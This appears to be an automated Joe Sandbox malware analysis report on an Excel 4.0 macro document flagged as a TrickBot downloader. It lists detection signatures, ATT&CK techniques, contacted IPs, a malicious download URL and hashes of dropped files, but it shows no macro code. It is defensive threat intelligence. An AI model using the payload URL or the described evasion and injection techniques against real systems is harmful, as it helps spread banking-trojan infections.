Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls) |
Analysis ID: | 355602 |
MD5: | 422030b616989ef7bf2f56a2f266068f |
SHA1: | 04ec47e9f08ed7e4861c6f252a381faee4283bf9 |
SHA256: | 6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | Code function: |
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | ReversingLabs: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Security Software Discovery12 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | System Network Configuration Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | System Information Discovery113 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
26% | ReversingLabs | Document-Word.Downloader.EncDoc |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false | unknown | |
www.chipmania.it | unknown | unknown | false | unknown | |
api.ip.sb | unknown | unknown | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| low | ||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355602 |
Start date: | 20.02.2021 |
Start time: | 02:15:52 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/7@3/2 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:16:42 | API Interceptor | |
02:16:42 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.81.0.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
200.52.147.93 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RedesyTelecomunicacionesHN | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
SERVERPLAN-ASIT | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660505379704475 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoX1 |
MD5: | 3CFBC6707341EF2AF668B0B66554A0D8 |
SHA1: | 2E47F97B737C1885E37322D4789B67BC79D0625F |
SHA-256: | BE269837B25164FC761785BE33AEB7A7ADAC5138AB3C081BA678F310A6674FEA |
SHA-512: | 1BE89DB6402BB1F07AA271C8E58AE75BB2AEAF20200EBCF118484AC8F7D5E9DF96D0C3B6A1AEE88F6197E85287D54645CE67D01B8835D8E737657521F0D6F954 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.471936882845852 |
Encrypted: | false |
SSDEEP: | 12:85QfAVNcLgXg/XAlCPCHaXgzB8IB/8PHxX+WnicvbTfbDtZ3YilMMEpxRljKw6Tg:85bNK/XTwz6IGxYeHDDv3q+rNru/ |
MD5: | 8095CD6291864E260C361BF1A10EA172 |
SHA1: | 752607AC2889B2E58D3EB31D7947D618A2A37059 |
SHA-256: | 1F3839B20BF958449313BD88CD52DB6CA36AFD3400648086ACF7BB7288B5BCCF |
SHA-512: | 4A8F9A3FCDEB7971FF3E2DFEF08F72611E5EF85FCC09D8EB8C8F142BD7DAD142FA28F46FA586CECCB02B7772C6DD3919BA03337800A54604CA773A56D69CA6B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.571681128279049 |
Encrypted: | false |
SSDEEP: | 48:8W/XT3IHvjHCEsfHC4+Qh2W/XT3IHvjHCEsfHC4+Q/:8W/XLILiW4+Qh2W/XLILiW4+Q/ |
MD5: | 219D84A5D4271A1B5652936B567E0447 |
SHA1: | F7BFF2FDA0916098A953AA4ECE644FAD43285EC7 |
SHA-256: | 2BA7892A29E9B37D1FB472361CC3276B8FFD38D38C54B974012B2D3301FD714C |
SHA-512: | E796B5EABBC8E454C63A8BBB9FC8DBE5BD42B7E5C698238B5BD77EA2538050A10CED8415D13E5EC7B94A9A539BE6B62A7DD14706A909EF611EF8F897D2BD7354 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.876408116811588 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW4CuscbcsoMW4CmM0bcsoMW4Cv:dj60wsoMWOwsoMWR0wsoMWV |
MD5: | 0705594BE5F4187688CFE5334909ABDC |
SHA1: | 321F5868568FDED9259F861BA40960D027D6A794 |
SHA-256: | BF282C362016DCFDBABDBE3DB34A3394434CE9EF8FFF9A7E0B3F6AAC1071BD6D |
SHA-512: | 4788B12278CAF8CE9C9782BE378B3464EDE8D0546D14DFC0965540C1E11EA692A468D7816FD0A72C10C11ABBAC473701E05E56CA4FCB4D8B7A61A21FA1F475B7 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239939848374362 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qnr:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKf |
MD5: | 8C6E6E3B60E506C0CCA7F66BBB581A1A |
SHA1: | 04F6ABD1996A42A02763B9F32DA952A7FDEDE7A0 |
SHA-256: | CF2F697E24C0B014B1513632471C307F9DCF141C34C44D5DF54297695457DD74 |
SHA-512: | 1BA5A33D57C5D082422E6431B7F53B57C971F2B97EE7C95C3B1D902E7F2B4B0F9D380EEC7F0CD56FAB6083A98710A0FF3B0657217B75748C6CF776277212F7C1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls |
File size: | 168960 |
MD5: | 422030b616989ef7bf2f56a2f266068f |
SHA1: | 04ec47e9f08ed7e4861c6f252a381faee4283bf9 |
SHA256: | 6f1c23f3d7e471cf0c4a91f59c94853128413b84065ef42ad2065337b973beab |
SHA512: | bd90c0d5f31bc58456d179d753cfb1838a23312f2b0ea2aa01c9ed6223d9c72ee25929f60b6a85a65e800997b9fe745392379b4eb96a51bf94b2f903b41b2ec1 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMn:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKi |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
